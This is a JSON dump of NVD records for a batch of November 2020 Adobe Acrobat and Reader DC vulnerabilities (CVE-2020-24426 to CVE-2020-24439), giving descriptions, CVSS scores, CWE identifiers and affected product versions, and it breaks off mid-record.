[{"lastseen": "2022-03-23T15:24:36", "description": "Acrobat Reader DC versions 2020.012.20048 (and earlier), 2020.001.30005 (and earlier) and 2017.011.30175 (and earlier) are affected by a use-after-free vulnerability when handling malicious JavaScript. This vulnerability could result in arbitrary code execution in the context of the current user. Exploitation requires user interaction in that a victim must open a malicious file.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-11-05T20:15:00", "type": "cve", "title": "CVE-2020-24430", "cwe": ["CWE-416"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-24430"], "modified": "2021-09-08T17:22:00", "cpe": ["cpe:/a:adobe:acrobat:20.001.30005", "cpe:/a:adobe:acrobat_reader_dc:20.012.20048", "cpe:/a:adobe:acrobat_reader_dc:17.011.30175", "cpe:/a:adobe:acrobat_dc:17.011.30175", "cpe:/a:adobe:acrobat_reader:20.001.30005", "cpe:/a:adobe:acrobat_dc:20.012.20048"], "id": "CVE-2020-24430", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-24430", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:adobe:acrobat:20.001.30005:*:*:*:classic:*:*:*", "cpe:2.3:a:adobe:acrobat_dc:20.012.20048:*:*:*:continuous:*:*:*", "cpe:2.3:a:adobe:acrobat_dc:17.011.30175:*:*:*:classic:*:*:*", "cpe:2.3:a:adobe:acrobat_reader_dc:20.012.20048:*:*:*:continuous:*:*:*", "cpe:2.3:a:adobe:acrobat_reader_dc:17.011.30175:*:*:*:classic:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:20.001.30005:*:*:*:classic:*:*:*"]}, {"lastseen": "2022-03-23T15:24:47", "description": "Acrobat Reader DC for macOS versions 2020.012.20048 (and earlier), 2020.001.30005 (and earlier) and 2017.011.30175 (and earlier) are affected by a security feature bypass. While the practical security impact is minimal, a defense-in-depth fix has been implemented to further harden the Adobe Reader update process.", "cvss3": {"exploitabilityScore": 1.3, "cvssV3": {"baseSeverity": "LOW", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "LOW", "baseScore": 2.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 1.4}, "published": "2020-11-05T20:15:00", "type": "cve", "title": "CVE-2020-24439", "cwe": ["CWE-347"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 1.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 1.2, "vectorString": "AV:L/AC:H/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-24439"], "modified": "2021-09-16T13:42:00", "cpe": ["cpe:/a:adobe:acrobat:20.001.30005", "cpe:/a:adobe:acrobat_reader_dc:20.012.20048", "cpe:/a:adobe:acrobat_reader_dc:17.011.30175", "cpe:/a:adobe:acrobat_dc:17.011.30175", "cpe:/a:adobe:acrobat_reader:20.001.30005", "cpe:/a:adobe:acrobat_dc:20.012.20048"], "id": "CVE-2020-24439", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-24439", "cvss": {"score": 1.2, "vector": "AV:L/AC:H/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:adobe:acrobat:20.001.30005:*:*:*:classic:*:*:*", "cpe:2.3:a:adobe:acrobat_dc:20.012.20048:*:*:*:continuous:*:*:*", "cpe:2.3:a:adobe:acrobat_dc:17.011.30175:*:*:*:classic:*:*:*", "cpe:2.3:a:adobe:acrobat_reader_dc:20.012.20048:*:*:*:continuous:*:*:*", "cpe:2.3:a:adobe:acrobat_reader_dc:17.011.30175:*:*:*:classic:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:20.001.30005:*:*:*:classic:*:*:*"]}, {"lastseen": "2022-03-23T15:24:32", "description": "Acrobat Reader versions 2020.012.20048 (and earlier), 2020.001.30005 (and earlier) and 2017.011.30175 (and earlier) are affected by an input validation vulnerability when decoding a crafted codec that could result in the disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "LOW", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 3.3, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 1.4}, "published": "2020-11-05T20:15:00", "type": "cve", "title": "CVE-2020-24427", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-24427"], "modified": "2021-09-08T17:22:00", "cpe": ["cpe:/a:adobe:acrobat:20.001.30005", "cpe:/a:adobe:acrobat_reader_dc:20.012.20048", "cpe:/a:adobe:acrobat_reader_dc:17.011.30175", "cpe:/a:adobe:acrobat_dc:17.011.30175", "cpe:/a:adobe:acrobat_reader:20.001.30005", "cpe:/a:adobe:acrobat_dc:20.012.20048"], "id": "CVE-2020-24427", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-24427", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:adobe:acrobat:20.001.30005:*:*:*:classic:*:*:*", "cpe:2.3:a:adobe:acrobat_dc:20.012.20048:*:*:*:continuous:*:*:*", "cpe:2.3:a:adobe:acrobat_dc:17.011.30175:*:*:*:classic:*:*:*", "cpe:2.3:a:adobe:acrobat_reader_dc:20.012.20048:*:*:*:continuous:*:*:*", "cpe:2.3:a:adobe:acrobat_reader_dc:17.011.30175:*:*:*:classic:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:20.001.30005:*:*:*:classic:*:*:*"]}, {"lastseen": "2022-03-23T15:24:34", "description": "Acrobat Reader DC versions 2020.012.20048 (and earlier), 2020.001.30005 (and earlier) and 2017.011.30175 (and earlier) for macOS are affected by a signature verification bypass that could result in local privilege escalation. Exploitation of this issue requires user interaction in that a victim must open a malicious file.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-11-05T20:15:00", "type": "cve", "title": "CVE-2020-24429", "cwe": ["CWE-347"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-24429"], "modified": "2021-09-08T17:22:00", "cpe": ["cpe:/a:adobe:acrobat:20.001.30005", "cpe:/a:adobe:acrobat_reader_dc:20.012.20048", "cpe:/a:adobe:acrobat_reader_dc:17.011.30175", "cpe:/a:adobe:acrobat_dc:17.011.30175", "cpe:/a:adobe:acrobat_reader:20.001.30005", "cpe:/a:adobe:acrobat_dc:20.012.20048"], "id": "CVE-2020-24429", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-24429", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:adobe:acrobat:20.001.30005:*:*:*:classic:*:*:*", "cpe:2.3:a:adobe:acrobat_dc:20.012.20048:*:*:*:continuous:*:*:*", "cpe:2.3:a:adobe:acrobat_dc:17.011.30175:*:*:*:classic:*:*:*", "cpe:2.3:a:adobe:acrobat_reader_dc:20.012.20048:*:*:*:continuous:*:*:*", "cpe:2.3:a:adobe:acrobat_reader_dc:17.011.30175:*:*:*:classic:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:20.001.30005:*:*:*:classic:*:*:*"]}, {"lastseen": "2022-03-23T15:24:37", "description": "Acrobat Reader DC versions 2020.012.20048 (and earlier), 2020.001.30005 (and earlier) and 2017.011.30175 (and earlier) for macOS are affected by a security feature bypass that could result in dynamic library code injection by the Adobe Reader process. Exploitation of this issue requires user interaction in that a victim must open a malicious file.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 4.4, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 2.5}, "published": "2020-11-05T20:15:00", "type": "cve", "title": "CVE-2020-24431", "cwe": ["CWE-285"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-24431"], "modified": "2021-09-08T17:22:00", "cpe": ["cpe:/a:adobe:acrobat:20.001.30005", "cpe:/a:adobe:acrobat_reader_dc:20.012.20048", "cpe:/a:adobe:acrobat_reader_dc:17.011.30175", "cpe:/a:adobe:acrobat_dc:17.011.30175", "cpe:/a:adobe:acrobat_reader:20.001.30005", "cpe:/a:adobe:acrobat_dc:20.012.20048"], "id": "CVE-2020-24431", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-24431", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:N"}, "cpe23": ["cpe:2.3:a:adobe:acrobat:20.001.30005:*:*:*:classic:*:*:*", "cpe:2.3:a:adobe:acrobat_dc:20.012.20048:*:*:*:continuous:*:*:*", "cpe:2.3:a:adobe:acrobat_dc:17.011.30175:*:*:*:classic:*:*:*", "cpe:2.3:a:adobe:acrobat_reader_dc:20.012.20048:*:*:*:continuous:*:*:*", "cpe:2.3:a:adobe:acrobat_reader_dc:17.011.30175:*:*:*:classic:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:20.001.30005:*:*:*:classic:*:*:*"]}, {"lastseen": "2022-03-23T15:24:46", "description": "Acrobat Reader DC versions 2020.012.20048 (and earlier), 2020.001.30005 (and earlier) and 2017.011.30175 (and earlier) are affected by a use-after-free vulnerability that could result in a memory address leak. Exploitation of this issue requires user interaction in that a victim must open a malicious file.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "LOW", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 3.3, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 1.4}, "published": "2020-11-05T20:15:00", "type": "cve", "title": "CVE-2020-24438", "cwe": ["CWE-416"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-24438"], "modified": "2021-09-08T17:22:00", "cpe": ["cpe:/a:adobe:acrobat:20.001.30005", "cpe:/a:adobe:acrobat_reader_dc:20.012.20048", "cpe:/a:adobe:acrobat_reader_dc:17.011.30175", "cpe:/a:adobe:acrobat_dc:17.011.30175", "cpe:/a:adobe:acrobat_reader:20.001.30005", "cpe:/a:adobe:acrobat_dc:20.012.20048"], "id": "CVE-2020-24438", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-24438", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:adobe:acrobat:20.001.30005:*:*:*:classic:*:*:*", "cpe:2.3:a:adobe:acrobat_dc:20.012.20048:*:*:*:continuous:*:*:*", "cpe:2.3:a:adobe:acrobat_dc:17.011.30175:*:*:*:classic:*:*:*", "cpe:2.3:a:adobe:acrobat_reader_dc:20.012.20048:*:*:*:continuous:*:*:*", "cpe:2.3:a:adobe:acrobat_reader_dc:17.011.30175:*:*:*:classic:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:20.001.30005:*:*:*:classic:*:*:*"]}, {"lastseen": "2022-03-23T15:24:31", "description": "Acrobat Reader DC versions 2020.012.20048 (and earlier), 2020.001.30005 (and earlier) and 2017.011.30175 (and earlier) are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "LOW", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 3.3, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 1.4}, "published": "2020-11-05T20:15:00", "type": "cve", "title": "CVE-2020-24426", "cwe": ["CWE-125"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-24426"], "modified": "2021-09-16T13:43:00", "cpe": ["cpe:/a:adobe:acrobat:20.001.30005", "cpe:/a:adobe:acrobat_reader_dc:20.012.20048", "cpe:/a:adobe:acrobat_reader_dc:17.011.30175", "cpe:/a:adobe:acrobat_dc:17.011.30175", "cpe:/a:adobe:acrobat_reader:20.001.30005", "cpe:/a:adobe:acrobat_dc:20.012.20048"], "id": "CVE-2020-24426", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-24426", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:adobe:acrobat:20.001.30005:*:*:*:classic:*:*:*", "cpe:2.3:a:adobe:acrobat_dc:20.012.20048:*:*:*:continuous:*:*:*", "cpe:2.3:a:adobe:acrobat_dc:17.011.30175:*:*:*:classic:*:*:*", "cpe:2.3:a:adobe:acrobat_reader_dc:20.012.20048:*:*:*:continuous:*:*:*", "cpe:2.3:a:adobe:acrobat_reader_dc:17.011.30175:*:*:*:classic:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:20.001.30005:*:*:*:classic:*:*:*"]}, {"lastseen": "2022-03-23T15:24:40", "description": "Acrobat Reader DC versions 2020.012.20048 (and earlier), 2020.001.30005 (and earlier) and 2017.011.30175 (and earlier) are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "LOW", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 3.3, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 1.4}, "published": "2020-11-05T20:15:00", "type": "cve", "title": "CVE-2020-24434", "cwe": ["CWE-125"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-24434"], "modified": "2021-09-16T13:43:00", "cpe": ["cpe:/a:adobe:acrobat:20.001.30005", "cpe:/a:adobe:acrobat_reader_dc:20.012.20048", "cpe:/a:adobe:acrobat_reader_dc:17.011.30175", "cpe:/a:adobe:acrobat_dc:17.011.30175", "cpe:/a:adobe:acrobat_reader:20.001.30005", "cpe:/a:adobe:acrobat_dc:20.012.20048"], "id": "CVE-2020-24434", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-24434", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:adobe:acrobat:20.001.30005:*:*:*:classic:*:*:*", "cpe:2.3:a:adobe:acrobat_dc:20.012.20048:*:*:*:continuous:*:*:*", "cpe:2.3:a:adobe:acrobat_dc:17.011.30175:*:*:*:classic:*:*:*", "cpe:2.3:a:adobe:acrobat_reader_dc:20.012.20048:*:*:*:continuous:*:*:*", "cpe:2.3:a:adobe:acrobat_reader_dc:17.011.30175:*:*:*:classic:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:20.001.30005:*:*:*:classic:*:*:*"]}, {"lastseen": "2022-03-23T15:24:42", "description": "Acrobat Pro DC versions 2020.012.20048 (and earlier), 2020.001.30005 (and earlier) and 2017.011.30175 (and earlier) are affected by an out-of-bounds write vulnerability that could result in writing past the end of an allocated memory structure. An attacker could leverage this vulnerability to execute code in the context of the current user. This vulnerability requires user interaction to exploit in that the victim must open a malicious document.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-11-05T20:15:00", "type": "cve", "title": "CVE-2020-24436", "cwe": ["CWE-787"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-24436"], "modified": "2021-09-16T13:43:00", "cpe": ["cpe:/a:adobe:acrobat:20.001.30005", "cpe:/a:adobe:acrobat_reader_dc:20.012.20048", "cpe:/a:adobe:acrobat_reader_dc:17.011.30175", "cpe:/a:adobe:acrobat_dc:17.011.30175", "cpe:/a:adobe:acrobat_reader:20.001.30005", "cpe:/a:adobe:acrobat_dc:20.012.20048"], "id": "CVE-2020-24436", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-24436", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:adobe:acrobat:20.001.30005:*:*:*:classic:*:*:*", "cpe:2.3:a:adobe:acrobat_dc:20.012.20048:*:*:*:continuous:*:*:*", "cpe:2.3:a:adobe:acrobat_dc:17.011.30175:*:*:*:classic:*:*:*", "cpe:2.3:a:adobe:acrobat_reader_dc:20.012.20048:*:*:*:continuous:*:*:*", "cpe:2.3:a:adobe:acrobat_reader_dc:17.011.30175:*:*:*:classic:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:20.001.30005:*:*:*:classic:*:*:*"]}, {"lastseen": "2022-03-23T15:24:38", "description": "Acrobat Reader DC versions 2020.012.20048 (and earlier), 2020.001.30005 (and earlier) and 2017.011.30175 (and earlier) and Adobe Acrobat Pro DC 2017.011.30175 (and earlier) are affected by an improper input validation vulnerability that could result in arbitrary JavaScript execution in the context of the current user. To exploit this issue, an attacker must acquire and then modify a certified PDF document that is trusted by the victim. The attacker then needs to convince the victim to open the document.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-11-05T20:15:00", "type": "cve", "title": "CVE-2020-24432", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-24432"], "modified": "2021-09-08T17:22:00", "cpe": ["cpe:/a:adobe:acrobat:20.001.30005", "cpe:/a:adobe:acrobat_reader_dc:20.012.20048", "cpe:/a:adobe:acrobat_reader_dc:17.011.30175", "cpe:/a:adobe:acrobat_dc:17.011.30175", "cpe:/a:adobe:acrobat_reader:20.001.30005", "cpe:/a:adobe:acrobat_dc:20.012.20048"], "id": "CVE-2020-24432", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-24432", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:adobe:acrobat:20.001.30005:*:*:*:classic:*:*:*", "cpe:2.3:a:adobe:acrobat_dc:20.012.20048:*:*:*:continuous:*:*:*", "cpe:2.3:a:adobe:acrobat_dc:17.011.30175:*:*:*:classic:*:*:*", "cpe:2.3:a:adobe:acrobat_reader_dc:20.012.20048:*:*:*:continuous:*:*:*", "cpe:2.3:a:adobe:acrobat_reader_dc:17.011.30175:*:*:*:classic:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:20.001.30005:*:*:*:classic:*:*:*"]}, {"lastseen": "2022-03-23T15:24:44", "description": "Acrobat Reader DC versions 2020.012.20048 (and earlier), 2020.001.30005 (and earlier) and 2017.011.30175 (and earlier) are affected by a use-after-free vulnerability in the processing of Format event actions that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-11-05T20:15:00", "type": "cve", "title": "CVE-2020-24437", "cwe": ["CWE-416"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-24437"], "modified": "2021-09-08T17:22:00", "cpe": ["cpe:/a:adobe:acrobat:20.001.30005", "cpe:/a:adobe:acrobat_reader_dc:20.012.20048", "cpe:/a:adobe:acrobat_reader_dc:17.011.30175", "cpe:/a:adobe:acrobat_dc:17.011.30175", "cpe:/a:adobe:acrobat_reader:20.001.30005", "cpe:/a:adobe:acrobat_dc:20.012.20048"], "id": "CVE-2020-24437", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-24437", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:adobe:acrobat:20.001.30005:*:*:*:classic:*:*:*", "cpe:2.3:a:adobe:acrobat_dc:20.012.20048:*:*:*:continuous:*:*:*", "cpe:2.3:a:adobe:acrobat_dc:17.011.30175:*:*:*:classic:*:*:*", "cpe:2.3:a:adobe:acrobat_reader_dc:20.012.20048:*:*:*:continuous:*:*:*", "cpe:2.3:a:adobe:acrobat_reader_dc:17.011.30175:*:*:*:classic:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:20.001.30005:*:*:*:classic:*:*:*"]}, {"lastseen": "2022-03-23T15:24:43", "description": "Acrobat Reader DC versions 2020.012.20048 (and earlier), 2020.001.30005 (and earlier) and 2017.011.30175 (and earlier) are affected by a heap-based buffer overflow vulnerability in the submitForm function, potentially resulting in arbitrary code execution in the context of the current user. Exploitation requires user interaction in that a victim must open a crafted .pdf file in Acrobat Reader.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": 